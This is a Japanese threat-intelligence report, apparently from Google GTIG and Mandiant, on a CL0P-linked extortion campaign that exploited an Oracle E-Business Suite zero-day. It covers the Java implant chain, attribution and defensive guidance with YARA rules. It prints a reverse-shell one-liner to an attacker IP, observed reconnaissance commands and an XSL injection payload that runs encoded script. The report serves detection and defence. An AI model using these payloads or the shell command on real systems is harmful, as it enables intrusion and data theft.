広範な恐喝キャンペーンで悪用された Oracle E-Business Suite のゼロデイ

執筆者: Peter Ukhanov、Genevieve Stark、Zander Work、Ashley Pearson、Josh Murchie、Austin Larsen

更新（10月11日）: 10月11日、Oracle は 追加のパッチをリリースし、CVE-2025-61884 に対処しました。

はじめに

2025年9月29日以降、Google Threat Intelligence Group（GTIG）と Mandiant は、CL0P 恐喝ブランドとの関係を主張する脅威アクターによる新たな大規模恐喝キャンペーンの追跡を開始しました。当該アクターは多数の組織の経営層に対し大量のメールを送信し、被害者の Oracle E-Business Suite（EBS）環境から機微データを窃取したと主張しました。2025年10月2日、Oracle は、脅威アクターが2025年7月に修正済みの脆弱性を悪用した可能性があると報告し、顧客に対して最新のクリティカル・パッチ・アップデートの適用を推奨しました。2025年10月4日、Oracle は顧客に対し、この脆弱性に対処するため 緊急パッチを適用するよう指示し、顧客はすべての Critical Patch Updates を常に最新に保つべきだという従来からの推奨を改めて強調しました。

当社の分析によれば、CL0P 恐喝キャンペーンは、EBS 顧客環境を標的とした数か月にわたる侵入活動に続いて実施されました。脅威アクター（複数の可能性あり）は、パッチ提供の数週間前である2025年8月9日という早い時期から、Oracle EBS 顧客に対してゼロデイ脆弱性である可能性のある CVE-2025-61882 を悪用していたとみられ、さらに2025年7月10日に遡る追加の不審活動も確認されています。ケースによっては、脅威アクターが影響を受けた組織から相当量のデータを持ち出すことに成功しています。

本稿では、キャンペーンの詳細な分析、脅威アクターが Oracle EBS を侵害するために用いた多段階の Java インプラント・フレームワークの分解、より早期の悪用活動の詳細、そして防御側のための実行可能なガイダンスと侵害指標（IOC）を提供します。

背景

CL0P（別名 CL0P^_- LEAKS）のデータ漏えいサイト（DLS）は2020年に設立されました。当初、GTIG は CL0P ランサムウェアを伴う多面的な恐喝オペレーションに DLS が使用され、FIN11 に帰属すると観測していました。より最近では、申し立てられた被害者の大半が、Accellion のレガシー・ファイル転送アプライアンス（FTA）、GoAnywhere MFT、MOVEit MFT、Cleo LexiCom など、マネージド・ファイル転送（MFT）システムにおけるゼロデイ脆弱性の大量悪用に起因するデータ窃取型恐喝インシデントに関連しているように見受けられます。これらのインシデントの多くでは、脅威アクターがゼロデイ（0-day）脆弱性を大量に悪用して被害者データを窃取し、その数週間後に恐喝を開始しました。このデータ窃取型恐喝活動は、最も頻繁には FIN11 および FIN11 が疑われる脅威クラスターに帰属されてきましたが、CL0P ランサムウェアと CL0P DLS が、異なる戦術・技術・手順（TTP）を持つ少なくとも1つの脅威アクターによって使用されている証拠も観測しています。これは、FIN11 が時間の経過とともにメンバーシップや提携を拡大してきた可能性を示唆します。

今回の Oracle EBS を標的とした最新キャンペーンは、この成功して高い影響を持つ運用モデルの継続を示しています。

脅威の詳細 

CL0P 恐喝キャンペーン

2025年9月29日以降、脅威アクターは、数百、場合によっては数千に及ぶ侵害済みの第三者アカウントから大量のメールキャンペーンを開始しました。これらのアカウントの認証情報（多様で無関係な組織に属するもの）は、地下フォーラムで販売されるインフォスティーラー・マルウェアのログから入手された可能性が高いと見られます。これは、正当性を付与しスパムフィルターを回避するために脅威アクターがよく用いる手口です。企業幹部に送られたメールでは、アクターが Oracle EBS アプリケーションに侵入し、文書を持ち出したと主張していました。 

注目すべき点として、メールには [email protected] と [email protected] の2つの連絡先アドレスが含まれており、これらは少なくとも2025年5月以降 CL0P DLS に掲載されています。主張を裏付けるため、脅威アクターは、2025年8月中旬まで遡るデータを含む、被害者の EBS 環境からの正当なファイル一覧を複数の組織に提示しています。恐喝メールでは、支払いと引き換えに窃取データの公開を防げると示唆していますが、金額や方法は明示されていません。これは、被害者が脅威アクターに連絡し、交渉権限があることを示した後に要求が提示されるのが一般的である、現代の恐喝オペレーションの典型です。

現時点で、GTIG はこのキャンペーンの被害者が CL0P DLS に掲載されているのを確認していません。これは、CL0P ブランドが関与した過去のキャンペーンと整合しており、アクターは通常、被害者データを投稿するまで数週間待つ傾向があります。

技術分析: エクスプロイトの分解

私たちは、最近の恐喝キャンペーン以前に発生していた Oracle E-Business Suite（EBS）サーバーを標的とする悪用活動を特定しており、その時期は2025年7月まで遡る可能性があります。

Oracle は10月4日に CVE-2025-61882 のパッチをリリースし、UiServlet コンポーネントを標的とする流出したエクスプロイトチェーンに言及しました。しかし Mandiant は、Oracle EBS に関わる複数の異なるエクスプロイトチェーンを観測しており、当初「既知の脆弱性が悪用されている」と示唆した10月2日の勧告の根拠は別のチェーンであった可能性が高いと見ています。現時点では、どの具体的な脆弱性／エクスプロイトチェーンが CVE-2025-61882 に対応するのかは不明ですが、GTIG は、10月11日にリリースされたパッチまで適用済みの Oracle EBS サーバーは、既知の悪用チェーンに対してはもはや脆弱ではない可能性が高いと評価しています。

2025年7月の活動: 「UiServlet」に関する不審活動

Mandiant のインシデント対応者は、2025年7月に Oracle EBS サーバーを標的とした活動を特定しました。アプリケーションログは /OA_HTML/configurator/UiServlet を標的とする悪用を示唆していました。Mandiant の調査で回収されたアーティファクトには、2025年10月3日に「SCATTERED LAPSUS$ HUNTERS」という Telegram グループで流出したエクスプロイトと重なる点がいくつかあります。しかし、GTIG は、2025年7月に観測された活動と当該エクスプロイトの使用を直接関連付けるには十分な証拠を欠いています。現時点で GTIG は、UNC6240（別名「Shiny Hunters」）に関連するアクターがこの悪用活動に関与していたとは評価していません。 

• 流出したエクスプロイトは、watchTowr Labs の分析によれば、サーバーサイド・リクエスト・フォージェリ（SSRF）、キャリッジリターン／ラインフィード（CRLF）インジェクション、認証バイパス、XSL テンプレートインジェクションなど複数の異なるプリミティブを組み合わせ、標的の Oracle EBS サーバーでリモートコード実行を獲得します。前述のとおり、このチェーンで悪用される脆弱性のいずれがどの CVE に対応するのかは不明です。悪用後に実行されるコマンドは、Linux では sh、Windows では cmd.exe を使用します。

• 流出したエクスプロイトのアーカイブには、Bash のリバースシェルを実行するための使用例が含まれており、コマンドは bash -i >& /dev/tcp/<ip>/<port> 0>&1 のような構造でした。

2025年7月パッチ公開前に観測された活動

2025年7月10日、2025年7月の Oracle EBS セキュリティ更新の公開前に、Mandiant は 200.107.207.26 からの不審な HTTP トラフィックを特定しました。GTIG はこの活動の正確な性質を確認できませんでしたが、Oracle EBS サーバーに対する初期の悪用試行であった可能性があります。ただし、流出エクスプロイトで行われるリモート XSL ペイロード取得と整合する外向き HTTP トラフィックを示すフォレンジック証拠や、不審なコマンド実行の観測がなく、実際の悪用試行であったと評価することはできません。

さらに、インターネットスキャンデータでは、前述の活動とほぼ同時期に Python の AIOHTTP サーバーを公開しているサーバーが確認されており、これは公開流出したエクスプロイトにおけるコールバックサーバーの使用と整合します。

2025年7月パッチ公開後に観測された活動

パッチ公開後、Mandiant は 161.97.99.49 から Oracle EBS サーバーに対する悪用試行とみられる活動を観測し、/OA_HTML/configurator/UiServlet への HTTP リクエストが記録されました。注目すべき点として、EBS に関する各種ログでは、これらのリクエストの一部がタイムアウトしており、流出した公開エクスプロイトに存在する SSRF 脆弱性、またはリクエストを正常にクローズするはずの後続活動が失敗した可能性を示唆しています。これらのエラーは、2025年7月パッチ公開前に記録された活動では観測されていません。

GTIG は現時点で、これら2つの活動セットが同一の脅威アクターによって実施されたかどうかを確認できていません。

2025年8月の活動: 「SyncServlet」を標的とするエクスプロイトチェーン

2025年8月、脅威アクターは SyncServlet コンポーネントの脆弱性を悪用し始め、未認証のリモートコード実行を可能にしました。この活動は、前述の活動でも観測された 200.107.207.26 を含む複数の脅威アクターサーバーから発生しました。

• エクスプロイトの流れ: 攻撃は POST リクエストを /OA_HTML/SyncServlet に送ることで開始されます。その後、アクターは XDO Template Manager の機能を用いて、EBS データベース内に新しい悪性テンプレートを作成します。エクスプロイトの最終段階は、Template Preview 機能を通じてペイロードをトリガーするリクエストです。次のエンドポイントへのリクエストは、高精度の侵害指標です:

/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=<TMP|DEF><16_RANDOM_HEX_STRING>&TemplateType=<XSL-TEXT|XML>…

<?xml version="1.0" encoding="UTF-8"?>
    <xsl:stylesheet version="1.0"
                    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                    xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
                    xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
                    xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
                    xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String">
        <xsl:template match="/">
            <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'<BASE64STRING>')"/>
            <xsl:variable name="js" select="str:new($bs)"/>
            <xsl:variable name="m" select="jsm:new()"/>
            <xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
            <xsl:variable name="code" select="eng:eval($e, $js)"/>
            <xsl:value-of select="$code"/>
        </xsl:template>
    </xsl:stylesheet>

注目すべき点として、この XSL ペイロードの構造は、前述した流出した Oracle EBS エクスプロイト内の XSL ペイロードと同一です。

GTIG は、XSL ペイロードに埋め込まれた少なくとも2種類の異なる Java ペイロードチェーンを特定しており、その一部は こちら でも議論されています:

• GOLDVEIN.JAVA – ダウンローダー: GOLDVEIN の Java 亜種で、攻撃者が管理するコマンド＆コントロール（C2 または C&C）IP アドレスへリクエストを送り、第二段階のペイロードを取得して実行するダウンローダーです。このビーコンは「TLSv3.1」ハンドシェイクに偽装されており、実行結果を HTTP レスポンス内の HTML コメントとしてアクターに返すロギング機能を含みます。現時点で Mandiant は、GOLDVEIN.JAVA によってダウンロードされた後続ペイロードを回収できていません。
  • GOLDVEIN は元々 PowerShell で書かれており、2024年12月に、UNC5936 として追跡される FIN11 が疑われる脅威クラスターによる複数の Cleo ソフトウェア製品の悪用キャンペーンで初めて観測されました。
• SAGE* 感染チェーン: 複数の Java ペイロードが入れ子になったチェーンで、/help/state/content/destination./navId.1/navvSetId.iHelp/ を含むエンドポイントへのリクエストを監視する永続的なフィルターを生成し、追加の Java ペイロードを展開します。
  • XSL ペイロードには Base64 エンコードされた SAGEGIFT ペイロードが含まれます。SAGEGIFT は Oracle WebLogic サーバー向けに書かれたカスタム Java リフレクティブ・クラスローダーです。
  • SAGEGIFT は SAGELEAF をロードするために使用されます。SAGELEAF は、Oracle WebLogic のサーブレットフィルターをリフレクションでロードするための 公開コード に基づくインメモリ・ドロッパーで、追加のロギングコードが埋め込まれています。SAGELEAF のログは、それをロードした親の SAGEGIFT ペイロードによって取得され、HTTP レスポンス内の HTML コメントとしてアクターに返すことができます（GOLDVEIN.JAVA と同じ構造）。
  • SAGELEAF は SAGEWAVE をインストールするために使用されます。SAGEWAVE は、Java クラスを含む AES 暗号化 ZIP アーカイブをアクターが展開できるようにする悪性 Java サーブレットフィルターです。分析の結果、SAGEWAVE のメインペイロードは GOLDTOMB の Cli モジュールに類似している可能性がありますが、現時点ではこの最終段階を直接観測していません。
  • Mandiant は、HTTP ヘッダー X-ORACLE-DMS-ECID が特定のハードコード値に設定されている場合にのみリクエストペイロードが処理される SAGEWAVE の亜種を観測しており、また、リクエストフィルタリングに用いられる HTTP パスとして /support/state/content/destination./navId.1/navvSetId.iHelp/ を含む別のパスも確認しています。

cat /etc/fstab
cat /etc/hosts
df -h
ip addr
cat /proc/net/arp
/bin/bash -i >& /dev/tcp/200.107.207.26/53 0>&1
arp -a
ifconfig
netstat -an
ping 8.8.8.8 -c 2
ps -aux

さらに Mandiant は、脅威アクターが Java（GOLDVEIN.JAVA の第二段階ペイロードを実行する EBS プロセス）から bash -i を用いて追加の bash プロセスを起動し、新たに起動した bash プロセスから各種コマンドを実行していることを観測しました。EBS アカウント「applmgr」として動作する Java によって起動された任意の bash -i プロセスの子プロセスは、脅威アクターのコマンドをハンティングする一環として確認すべきです。

帰属: 確認済みおよび疑いのある FIN11 活動との重なり

GTIG は現時点で、この活動を追跡中の脅威グループに正式に帰属させていません。ただし、CL0P 恐喝ブランドの使用（少なくとも2025年5月以降 CL0P DLS に掲載されている連絡先アドレス [email protected] および [email protected] を含む）は注目に値します。GTIG は当初、CL0P ランサムウェアを伴う多面的な恐喝オペレーションに DLS が使用され、FIN11 に帰属すると観測していました。より最近では、申し立てられた被害者の大半が、FIN11 および FIN11 が疑われる脅威クラスターにしばしば帰属される、マネージド・ファイル転送（MFT）システムの悪用に起因するデータ窃取型恐喝インシデントに関連しているように見受けられます。しかし、CL0P ランサムウェアおよび CL0P DLS が FIN11 のみによって独占的に使用されてきたわけではないことを示す証拠も観測しており、この要素だけに基づいて帰属することはできません。 

CL0P との重なりに加え、侵害後ツールは、FIN11 が疑われるキャンペーンで以前使用されたマルウェアと論理的な類似性を示しています。具体的には、第二段階ペイロードを取得するインメモリの Java ベース・ローダー GOLDVEIN.JAVA の使用は、2024年後半に Cleo MFT 脆弱性の大量悪用の際、FIN11 が疑われるクラスター UNC5936 によって展開された GOLDVEIN ダウンローダーおよび GOLDTOMB バックドアを想起させます。さらに、最近の恐喝メール送信に使用された侵害アカウントの1つは、以前 FIN11 によって使用されていました。継続的な分析により、この最近の活動と FIN11 や UNC5936 など他の脅威クラスターとの関係について、さらなる詳細が明らかになる可能性があります。

影響

広く利用されているエンタープライズアプリケーションのゼロデイ脆弱性を悪用し、その数週間後に大規模なブランド付き恐喝キャンペーンを実施するというパターンは、歴史的に FIN11 に帰属されてきた活動の特徴であり、他の脅威アクターにとっても魅力となり得る戦略的利点があります。機微データを保存する公開アプリケーションやアプライアンスを標的とすることで、脅威アクターはラテラルムーブメントに時間とリソースを割く必要がなくなり、データ窃取オペレーションの効率が高まる可能性があります。脅威アクターがゼロデイ脆弱性を活用し、ネットワーク上の痕跡を限定し、恐喝通知を遅延させるという全体的なアプローチは、防御側に存在を気付かせることなく多数の組織からデータを持ち出せる可能性があるため、全体的な影響をほぼ確実に増大させます。CL0P 関連アクターは、少なくとも2020年後半以降この手法を用いてきたことから、これらの大量悪用キャンペーンを成功と捉えている可能性が極めて高いと考えられます。したがって、少なくとも短期的には、同様のアプリケーション向けのゼロデイエクスプロイト獲得に引き続きリソースを投入すると予想されます。 

推奨事項 

GTIG と Mandiant は、この活動がもたらす脅威を軽減・検知し、Oracle E-Business Suite 環境を強化するために、次の対応を推奨します:

• 緊急パッチを直ちに適用する: 2025年10月4日にリリースされた Oracle EBS パッチ（CVE-2025-61882）を優先して適用してください。野外での能動的な悪用が確認されているため、初期侵入を防ぐうえでこれが最重要のステップです。

• データベース内の悪性テンプレートをハントする: 脅威アクター（複数の可能性あり）は、ペイロードを EBS データベースに直接保存します。管理者は直ちに XDO_TEMPLATES_B および XDO_LOBS テーブルをクエリし、悪性テンプレートを特定してください。TEMPLATE_CODE が TMP または DEF で始まるテンプレートを確認します。ペイロードは LOB_CODE 列に保存されています。

SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC;
SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;

• 外向きインターネットアクセスを制限する: 観測された Java ペイロードは、第二段階インプラントの取得やデータ持ち出しのために C2 サーバーへの外向き接続を必要とします。EBS サーバーからインターネットへの不要な外向きトラフィックをすべてブロックしてください。これは、サーバーが侵害されていたとしても攻撃チェーンを妨害し得る代替的な統制です。

• ネットワークログを監視・分析する: 侵害指標を監視してください。TemplatePreviewPG エンドポイントへのリクエストで、TemplateCode が TMP または DEF で始まるものは、悪用試行の強い指標です。加えて、/OA_HTML/configurator/UiServlet および /OA_HTML/SyncServlet への異常なリクエストを調査してください。

• メモリフォレンジックを活用する: 本キャンペーンで使用されたインプラントは主に Java ベースで、メモリ上で実行されます。侵害が疑われる場合、EBS アプリケーションに関連する Java プロセスのメモリ解析により、ディスク上に存在しない悪性コードやアーティファクトが明らかになる可能性があります。

謝辞 

本分析は、Google Threat Intelligence Group および Mandiant Consulting の各所からの支援なしには実現しませんでした。また、FLARE の Genwei Jiang と Elliot Chernofsky に特に感謝します。 

侵害指標

登録ユーザー向けに、Google Threat Intelligence（GTI）コレクション内で 以下の侵害指標が利用可能です。

rule G_Downloader_GOLDVEIN_JAVA_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$chunk1 = "175,121,73" base64
		$chunk2 = "249,254,255" base64
		$chunk3 = "235,176,29" base64
		$chunk4 = "242,61,32" base64
		$chunk5 = "189,66,134" base64
		$str1 = "java.net.Socket(h,443)" base64
		$str2 = "TLSv3.1" base64
		$decoded1 = "[175,121,73,249,254,255,235,176,29,242,61,32,189,66,134,102,56,208,18,10,132,242,223,202,90,97,118,3,83,136,84,213]"
		$decoded2 = "java.net.Socket(h,443)"
		$decoded3 = "TLSv3.1"
	condition:
		(3 of ($chunk*) and all of ($str*)) or all of ($decoded*)
}

rule G_Dropper_SAGEGIFT_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "ServletRequestImpl" base64
		$str2 = "getServletRequest" base64
		$str3 = "ServletResponseImpl" base64
		$str4 = "dc=cl.getDeclaredMethod('defineClass',[cb,ci,ci])" base64
		$decoded1 = "ServletRequestImpl"
		$decoded2 = "getServletRequest"
		$decoded3 = "ServletResponseImpl"
		$decoded4 = "dc=cl.getDeclaredMethod('defineClass',[cb,ci,ci])"
	condition:
		all of ($str*) or all of ($decoded*)
}

rule G_Dropper_SAGELEAF_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$log1 = "n1=%d n2=%d"
		$log2 = "ctx.l=%d"
		$log3 = "Filter=" fullword
		$pat = "/help/*"
		$s1 = "weblogic.t3.srvr.ServerRuntime"
		$s2 = "gzipDecompress"
		$s3 = "BASE64Decoder"
		$s4 = "getDeclaredMethod"
	condition:
		2 of ($log*) and 5 of them
}

rule G_Launcher_SAGEWAVE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Log4jConfigQpgsubFilter"
		$s2 = ".Cli" fullword
		$s3 = "httpReq" fullword
		$s4 = "AES/CBC/NoPadding"
		$s5 = "javax/servlet/FilterChain"
		$s6 = "java/lang/reflect/Method"
	condition:
		4 of ($s*) and filesize < 1MB
}